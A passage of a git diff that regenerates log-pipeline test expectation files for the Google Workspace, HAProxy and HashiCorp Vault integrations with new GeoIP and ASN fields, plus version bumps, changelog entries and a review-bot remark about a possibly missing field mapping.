"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_phone_edit\"}}", "provider": "user_accounts", "action": "recovery_phone_edit", @@ -329,6 +389,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -338,7 +410,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537583700Z", + "ingested": "2021-12-14T14:45:20.193643198Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"recovery_info_change\",\"name\":\"recovery_secret_qa_edit\"}}", "provider": "user_accounts", "action": "recovery_secret_qa_edit", @@ -389,6 +461,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -398,7 +482,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537589400Z", + "ingested": "2021-12-14T14:45:20.193643589Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_enroll\"}}", "provider": "user_accounts", "action": "titanium_enroll", @@ -449,6 +533,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -458,7 +554,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:18.537595200Z", + "ingested": "2021-12-14T14:45:20.193643974Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"user_accounts\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"titanium_change\",\"name\":\"titanium_unenroll\"}}", "provider": "user_accounts", "action": "titanium_unenroll", diff --git a/packages/google_workspace/manifest.yml b/packages/google_workspace/manifest.yml index 6491dcaab1b..53d74668da9 100644 --- a/packages/google_workspace/manifest.yml +++ b/packages/google_workspace/manifest.yml @@ -1,6 +1,6 @@ name: google_workspace title: Google Workspace Audit Reports -version: 1.2.1 +version: 1.2.2 release: ga description: Collect audit reports from Google Workspaces with Elastic Agent. type: integration diff --git a/packages/haproxy/changelog.yml b/packages/haproxy/changelog.yml index 7d6139fa5f7..fec9f74369b 100644 --- a/packages/haproxy/changelog.yml +++ b/packages/haproxy/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.0.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.0.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json index 196da4600dc..cf73530321f 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-default.log-expected.json 
@@ -25,12 +25,24 @@ "ip": "67.43.156.13" }, "source": { - "port": 40780, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 40780, "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:28.354415600Z", + "ingested": "2021-12-14T14:46:40.578911001Z", "original": "Sep 20 15:42:59 67.43.156.13 haproxy[24551]: Connect from 67.43.156.13:40780 to 67.43.156.13:5000 (main/HTTP)", "category": [ "web", diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json index a31e3387c80..0b61b0830fb 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-haproxy.log-expected.json @@ -7,8 +7,20 @@ }, "temp": {}, "source": { - "port": 38862, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 38862, "ip": "67.43.156.13" }, "url": { @@ -73,7 +85,7 @@ }, "event": { "duration": 2000000, - "ingested": "2021-12-09T13:39:28.437354700Z", + "ingested": "2021-12-14T14:46:40.692084383Z", "original": "Jul 30 09:03:52 localhost haproxy[32450]: 67.43.156.13:38862 [30/Jul/2018:09:03:52.726] incoming~ docs_microservice/docs 0/0/1/0/2 304 168 - - ---- 6/6/0/0/0 0/0 {docs.example.internal||} {|||} \"GET /component---src-pages-index-js-4b15624544f97cf0bb8f.js HTTP/1.1\"", "category": [ "web" 
@@ -146,7 +158,7 @@ }, "event": { "duration": 18000000, - "ingested": "2021-12-09T13:39:28.437363200Z", + "ingested": "2021-12-14T14:46:40.692086776Z", "original": "May 22 02:22:22 server1 haproxy[5089]: -:22222 [22/May/2021:02:22:22.222] www-https~ myapp/node2 site.domain.com 0/0/0/18/18 200 200 - - ---- 222/222/2/0/0 0/0 \"OPTIONS /api/v2/app/ HTTP/1.1\"", "category": [ "web" diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json index 45cd17e2ffa..d853009c170 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-httplog-no-headers.log-expected.json @@ -68,7 +68,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:28.671159700Z", + "ingested": "2021-12-14T14:46:40.952826309Z", "original": "Dec 10 12:01:46 voyager haproxy[19312]: 127.0.0.1:35982 [10/Dec/2018:12:01:46.395] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 \"GET / HTTP/1.1\"", "category": [ "web" @@ -145,7 +145,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:28.671164Z", + "ingested": "2021-12-14T14:46:40.952829108Z", "original": "Dec 10 15:46:49 voyager haproxy[29785]: 127.0.0.1:43738 [10/Dec/2018:15:46:49.497] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 {localhost:8888||} \"GET /foo HTTP/1.1\"", "category": [ "web" @@ -226,7 +226,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:28.671167600Z", + "ingested": "2021-12-14T14:46:40.952829521Z", "original": "Dec 10 15:48:56 voyager haproxy[7873]: 127.0.0.1:44542 [10/Dec/2018:15:48:56.017] http-webservices http-webservices/\u003cNOSRV\u003e 0/-1/-1/-1/0 503 213 - - SC-- 1/1/0/0/0 0/0 {localhost:8888||} {|} \"GET /foo HTTP/1.1\"", "category": [ "web" 
diff --git a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json index 9804f966f39..a6d952789be 100644 --- a/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json +++ b/packages/haproxy/data_stream/log/_dev/test/pipeline/test-tcplog.log-expected.json @@ -41,7 +41,7 @@ }, "event": { "duration": 1000000, - "ingested": "2021-12-09T13:39:29.001644200Z", + "ingested": "2021-12-14T14:46:41.298330789Z", "original": "Sep 20 15:44:23 127.0.0.1 haproxy[25457]: 127.0.0.1:40962 [20/Sep/2018:15:44:23.285] main app/\u003cNOSRV\u003e -1/-1/1 212 SC 1/1/0/0/0 0/0", "kind": "event" }, diff --git a/packages/haproxy/data_stream/log/fields/ecs.yml b/packages/haproxy/data_stream/log/fields/ecs.yml index 050ff60ac12..418948ab587 100644 --- a/packages/haproxy/data_stream/log/fields/ecs.yml +++ b/packages/haproxy/data_stream/log/fields/ecs.yml @@ -36,6 +36,8 @@ name: related.ip - external: ecs name: source.address +- external: ecs + name: source.as.number - external: ecs name: source.geo.city_name - external: ecs diff --git a/packages/haproxy/docs/README.md b/packages/haproxy/docs/README.md index 73befe87d3a..6bf6a918335 100644 --- a/packages/haproxy/docs/README.md +++ b/packages/haproxy/docs/README.md 
@@ -102,6 +102,7 @@ The `log` dataset collects the HAProxy application logs. | process.pid | Process id. | long | | related.ip | All of the IPs seen on your event. | ip | | source.address | Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| source.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | | source.geo.city_name | City name. | keyword | | source.geo.continent_name | Name of the continent. | keyword | | source.geo.country_iso_code | Country ISO code. | keyword | diff --git a/packages/haproxy/manifest.yml b/packages/haproxy/manifest.yml index 8fba23061e5..4b0c1b7130a 100644 --- a/packages/haproxy/manifest.yml +++ b/packages/haproxy/manifest.yml @@ -1,6 +1,6 @@ name: haproxy title: HAProxy -version: 1.0.1 +version: 1.0.2 description: Collect logs and metrics from HAProxy servers with Elastic Agent. type: integration icons: diff --git a/packages/hashicorp_vault/changelog.yml b/packages/hashicorp_vault/changelog.yml index 1c02934b57b..86ae5c409eb 100644 --- a/packages/hashicorp_vault/changelog.yml +++ b/packages/hashicorp_vault/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index f8156983e31..a033d0919ec 100644 
--- a/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/hashicorp_vault/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -55,10 +55,22 @@ ] }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:31.089175500Z", + "ingested": "2021-12-14T14:46:43.491199737Z", "original": "{\"time\":\"2020-12-01T20:29:04.356625452Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"67.43.156.13\"}}", "kind": "event", "action": "update", 
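Review bot: The regenerated expectation now asserts `source.as.number` together with the `source.geo.*` block for the 67.43.156.13 event, but a matching `fields/ecs.yml` entry for this data stream (`- external: ecs` / `  name: source.as.number`, as the haproxy hunk adds) is not within this view; if the PR does not add it, the pipeline test still passes while the field stays unmapped in the index template. The same applies to the second hunk of this file. The surrounding JSON document extends beyond the hunk.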
@@ -153,10 +165,22 @@ ] }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:31.089185200Z", + "ingested": "2021-12-14T14:46:43.491203315Z", "original": "{\"time\":\"2020-12-01T20:29:04.36089379Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"display_name\":\"oidc-12349999999999999999\",\"policies\":[\"default\",\"group-admin\"],\"token_policies\":[\"default\",\"group-admin\"],\"metadata\":{\"account_id\":\"12349999999999999999\",\"email\":\"example@gmail.com\",\"role\":\"gmail\"},\"entity_id\":\"e4f5c67a-6f7e-789d-ae56-a1fe3ae23046\",\"token_type\":\"service\",\"token_ttl\":3600,\"token_issue_time\":\"2020-12-01T20:28:40Z\"},\"request\":{\"id\":\"cd09708b-11cc-2985-648b-cfe262cf7e50\",\"operation\":\"update\",\"mount_type\":\"system\",\"client_token\":\"hmac-sha256:9cc3baa3c2bd7a4b233ca1fdcf69df91c8f2a9f14ddda54a4039190f581dd327\",\"client_token_accessor\":\"hmac-sha256:eb605bd7f8a5ceb951b9ab42cae6d6c3f12f203cb2c2a78e33e899f77dceb931\",\"namespace\":{\"id\":\"root\"},\"path\":\"sys/capabilities-self\",\"data\":{\"paths\":[\"hmac-sha256:fd04b28916cb60f622b1ebce308b339b468f5da93fa735f985f4435049627a27\"]},\"remote_address\":\"67.43.156.13\"},\"response\":{\"mount_type\":\"system\",\"data\":{\"capabilities\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815f
d4bb4126fdedce5fc87bb\"],\"secret/metadata/apps/github-runner/ca-cert\":[\"hmac-sha256:b77b79078c7bad1402a1ec74613454fd85efa203f1aa557fd2a9718cfd4ef367\",\"hmac-sha256:8d0bb80a69f442489908170e1831503c65b2f9d45a3250eac21fc16840416e5a\",\"hmac-sha256:c5086738f6225235066f69681e94111d94a45a268e9f0c64c6105073e32e8176\",\"hmac-sha256:3d439b7d92cbd8123fda8462716af05ae15710c8e2905eaba8d5452fccbad2f2\",\"hmac-sha256:5622a2d8fedf53e4671d6f371c59e40f3379030815fd4bb4126fdedce5fc87bb\"]}}}", "kind": "event", "action": "update", @@ -216,7 +240,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-12-09T13:39:31.089189500Z", + "ingested": "2021-12-14T14:46:43.491203857Z", "original": "{\"time\":\"2021-07-19T17:19:00.673898225Z\",\"type\":\"request\",\"auth\":{\"token_type\":\"default\"},\"request\":{\"id\":\"24ac580b-805a-d9ee-4d0d-7046932f4e05\",\"operation\":\"update\",\"mount_type\":\"pki\",\"client_token\":\"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23\",\"namespace\":{\"id\":\"root\"},\"path\":\"internal-ca/issue/internal-server\",\"data\":{\"alt_names\":\"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee\",\"common_name\":\"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c\",\"ip_sans\":\"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2\"},\"remote_address\":\"10.6.8.34\"},\"error\":\"permission denied\"}", "kind": "event", "action": "update", 
@@ -281,7 +305,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-12-09T13:39:31.089194600Z", + "ingested": "2021-12-14T14:46:43.491204264Z", "original": "{\"time\":\"2021-07-19T17:19:00.674663552Z\",\"type\":\"response\",\"auth\":{\"token_type\":\"default\"},\"request\":{\"id\":\"24ac580b-805a-d9ee-4d0d-7046932f4e05\",\"operation\":\"update\",\"mount_type\":\"pki\",\"client_token\":\"hmac-sha256:db417023d954a03aea8f56a3daf35460aa51920337420c7c22bcbb6b10852f23\",\"namespace\":{\"id\":\"root\"},\"path\":\"internal-ca/issue/internal-server\",\"data\":{\"alt_names\":\"hmac-sha256:9760c514cdbf3ec61fa8d375643f29a78640528ddbbef6a49053ef9de6251eee\",\"common_name\":\"hmac-sha256:bc800a949f7b2fe6401884da3a085de232365d7b508d741198fa2d88815f6d7c\",\"ip_sans\":\"hmac-sha256:b6d902ee3c49cae1cfa8c9172f649716f802a4186c686b813bd344077fe0b5b2\"},\"remote_address\":\"10.6.8.34\"},\"response\":{\"mount_type\":\"pki\",\"data\":{\"error\":\"hmac-sha256:409ef1533baffc8e15cd4424780c9aba5d10f168b8d641f111da43e7955451fa\"}},\"error\":\"1 error occurred:\\n\\t* permission denied\\n\\n\"}", "kind": "event", "action": "update", 
@@ -356,7 +380,7 @@ "ip": "10.6.8.36" }, "event": { - "ingested": "2021-12-09T13:39:31.089198700Z", + "ingested": "2021-12-14T14:46:43.491204651Z", "original": "{\"time\":\"2021-06-29T17:26:11.402530449Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"display_name\":\"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner\",\"policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"token_policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"metadata\":{\"AllocationID\":\"375f9cb3-4355-42c7-eab5-029f8a310ca7\",\"Namespace\":\"\",\"NodeID\":\"b70676cb-731b-976b-edc4-a5b1bb963fe4\",\"Task\":\"runner\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-04-29T21:53:46Z\"},\"request\":{\"id\":\"0042ad1b-1400-7eb7-5e25-1dfc898c1998\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"client_token_accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/continuous-delivery/aws-bucket-sse-c\",\"remote_address\":\"10.6.8.36\"}}", "kind": "event", "action": "read", 
@@ -454,7 +478,7 @@ "ip": "10.6.8.36" }, "event": { - "ingested": "2021-12-09T13:39:31.089204100Z", + "ingested": "2021-12-14T14:46:43.491205082Z", "original": "{\"time\":\"2021-06-29T17:26:11.409840527Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"display_name\":\"token-375f9cb3-4355-42c7-eab5-029f8a310ca7-runner\",\"policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"token_policies\":[\"app-continuous-delivery\",\"app-github-runner\",\"default\"],\"metadata\":{\"AllocationID\":\"375f9cb3-4355-42c7-eab5-029f8a310ca7\",\"Namespace\":\"\",\"NodeID\":\"b70676cb-731b-976b-edc4-a5b1bb963fe4\",\"Task\":\"runner\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-04-29T21:53:46Z\"},\"request\":{\"id\":\"0042ad1b-1400-7eb7-5e25-1dfc898c1998\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:95b624915ff8dd55a4028bb57d1af8c6d487a99033b507b99a5a6e943b4933ef\",\"client_token_accessor\":\"hmac-sha256:8fa4f7f3d1fd812064950025cde2b1565829a9dc5075253399e5ede8f8a1d98e\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/continuous-delivery/aws-bucket-sse-c\",\"remote_address\":\"10.6.8.36\"},\"response\":{\"mount_type\":\"kv\",\"data\":{\"data\":{\"customer_key\":\"hmac-sha256:85d3c6e705ea04f49772b92cc7335e34c53f0264a6d75bba3ab95bad22ca5bd1\"},\"metadata\":{\"created_time\":\"hmac-sha256:9c910646d7399704ee015b4247b374bfb950282339d902a221b1ff4c83b13ee7\",\"deletion_time\":\"hmac-sha256:17a84bc5c1c7ee851af0069663ab9de3c879107724470fa34fc0b5418fb653db\",\"destroyed\":false,\"version\":1}}}}", "kind": "event", "action": "read", 
@@ -536,7 +560,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-12-09T13:39:31.089259300Z", + "ingested": "2021-12-14T14:46:43.491205470Z", "original": "{\"time\":\"2021-06-29T18:01:29.545476939Z\",\"type\":\"request\",\"auth\":{\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"display_name\":\"token-c1d6c089-2f46-ff11-5988-38636bddf8d9-homeassistant\",\"policies\":[\"app-home-assistant\",\"default\"],\"token_policies\":[\"app-home-assistant\",\"default\"],\"metadata\":{\"AllocationID\":\"c1d6c089-2f46-ff11-5988-38636bddf8d9\",\"Namespace\":\"\",\"NodeID\":\"a28cef3a-f9e6-ad7d-bc5f-2c5ac27eec51\",\"Task\":\"homeassistant\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-06-24T21:22:03Z\"},\"request\":{\"id\":\"3aa3f349-b55a-53e3-a795-dd4137d64299\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"client_token_accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/home-assistant/secrets_yaml\",\"remote_address\":\"10.6.8.34\"}}", "kind": "event", "action": "read", 
@@ -662,7 +686,7 @@ "ip": "10.6.8.34" }, "event": { - "ingested": "2021-12-09T13:39:31.089265900Z", + "ingested": "2021-12-14T14:46:43.491205856Z", "original": "{\"time\":\"2021-06-29T18:01:29.547355273Z\",\"type\":\"response\",\"auth\":{\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"display_name\":\"token-c1d6c089-2f46-ff11-5988-38636bddf8d9-homeassistant\",\"policies\":[\"app-home-assistant\",\"default\"],\"token_policies\":[\"app-home-assistant\",\"default\"],\"metadata\":{\"AllocationID\":\"c1d6c089-2f46-ff11-5988-38636bddf8d9\",\"Namespace\":\"\",\"NodeID\":\"a28cef3a-f9e6-ad7d-bc5f-2c5ac27eec51\",\"Task\":\"homeassistant\"},\"token_type\":\"service\",\"token_ttl\":259200,\"token_issue_time\":\"2021-06-24T21:22:03Z\"},\"request\":{\"id\":\"3aa3f349-b55a-53e3-a795-dd4137d64299\",\"operation\":\"read\",\"mount_type\":\"kv\",\"client_token\":\"hmac-sha256:f69c28fde8609df2a0ec6a316c0293179fa922a8a3a660a314859e6cff8e5fef\",\"client_token_accessor\":\"hmac-sha256:2ee197e25b333d83ba45d0c40aca153e0ad6c9e42b04b6de6a5b5b575de58771\",\"namespace\":{\"id\":\"root\"},\"path\":\"secret/data/apps/home-assistant/secrets_yaml\",\"remote_address\":\"10.6.8.34\"},\"response\":{\"mount_type\":\"kv\",\"data\":{\"data\":{\"aladdin_connect_password\":\"hmac-sha256:f3a85a98373fa879041a438606e38773fdfaca9d99e2a1ee08183a2cb8fc9a17\",\"aladdin_connect_username\":\"hmac-sha256:b3c982a71d17164325f4ef6a9831a132e1bb789833fc6d1ecab5d36bc71df112\",\"elasticsearch_password\":\"hmac-sha256:8d2328e2c80428977858c0a80c6624c7910dd7da0b74c8d33e4d8d22fc0e9ad1\",\"elasticsearch_url\":\"hmac-sha256:c63aa2b5d15069aa9ff53eb1b6f4418a21a87c4fe508655d7f396b4bdf73492c\",\"elasticsearch_username\":\"hmac-sha256:bb7bdfaa02957aaf85efd2ea4585e05aa1ccb4594eb6820078bf8df46d123133\",\"rest_notify_cisco_phone_csrc_token\":\"hmac-sha256:b2120f2e905e41167ea380586d9f1bb137728
73bb3e35aba28daca747921faad\",\"rest_notify_cisco_phone_password\":\"hmac-sha256:a4c3451df78d28825309c3b25fefb6fdb9314350da1169b012923325929d2b5d\",\"rest_notify_cisco_phone_username\":\"hmac-sha256:1229909bcdaa7acf6894ebfa51daff701b9f026f7bfff5525fe7ddfcf8469af6\",\"smtp_host\":\"hmac-sha256:bf4e6e6f4b1af3beb385006278b7e2da94eb4b243af8738727ba5e82375138c5\",\"smtp_password\":\"hmac-sha256:7b8a462d76578b0e4ddf162d9a244eb5a736d3d04b21d9ed399ad7f44032743e\",\"smtp_port\":587,\"smtp_username\":\"hmac-sha256:d97eb233a52d67e2fb16b43950b8537659b69a13e03aa58a771d8e82379354e4\",\"twilio_account_sid\":\"hmac-sha256:509150eeaf7657a069a37df450fe5821b307a882a2634230edf0b8b172f2fca8\",\"twilio_auth_token\":\"hmac-sha256:09cf3ffa023a5b5750d0aaff696f767b5a00c1af430b297abdc84d53dd4d139e\",\"cam_backyard_rtsp_url\":\"hmac-sha256:bcac97c20cdc641ca7ba4d1e4c80246961f6f116670ce6ae32be1a01be36fed1\",\"cam_backyard_url\":\"hmac-sha256:5a9348e779c7260e4375a734a4947506e97f86098e45db8d63ba800698d26c34\",\"cam_basement_door_rtsp_url\":\"hmac-sha256:ffd1f989ed0632e542f760ae8e683852e6d4b22acb24b5eae94e1568e977b007\",\"cam_basement_door_url\":\"hmac-sha256:550f62496448494a4a30a4c8499903ea58ea7ab43102a56103020c122795861b\",\"cam_driveway_rtsp_url\":\"hmac-sha256:7b732f13b417be1d8387dc9c517087cd2f9a854898f8bd50922ae39c9123cf5f\",\"cam_driveway_url\":\"hmac-sha256:aef04b9fc7c345e7cb49f3833fbe0d56c8d8c6c6d922152250019f83bfc38acc\",\"cam_front_door_rtsp_url\":\"hmac-sha256:db5ef5a052e6d09fee199dede89f5178afd5f642843268aa5bb43e755785f916\",\"cam_front_door_url\":\"hmac-sha256:6b5129afbd2e43f8ac8fe25a0b7c27f69c19d8713a95ac98ebfa65c8e51fd089\",\"cam_garage_rtsp_url\":\"hmac-sha256:10aa878ec26fdfa5e3a486ead013c693425f5c6bd3315b9365132a0c963c30f6\",\"cam_garage_url\":\"hmac-sha256:80d5c5b1080b12ed3681806bcc560f2ff0f53a43549df72396b14f41d1871dbf\",\"cam_mechanical_room_rtsp_url\":\"hmac-sha256:e343a772988cbc3262c6256df08c0c9f1a0f50e3bcefe3f39febc7cb135e2132\",\"cam_mechanical_room_url\":\"hmac-sha256:fd1f4
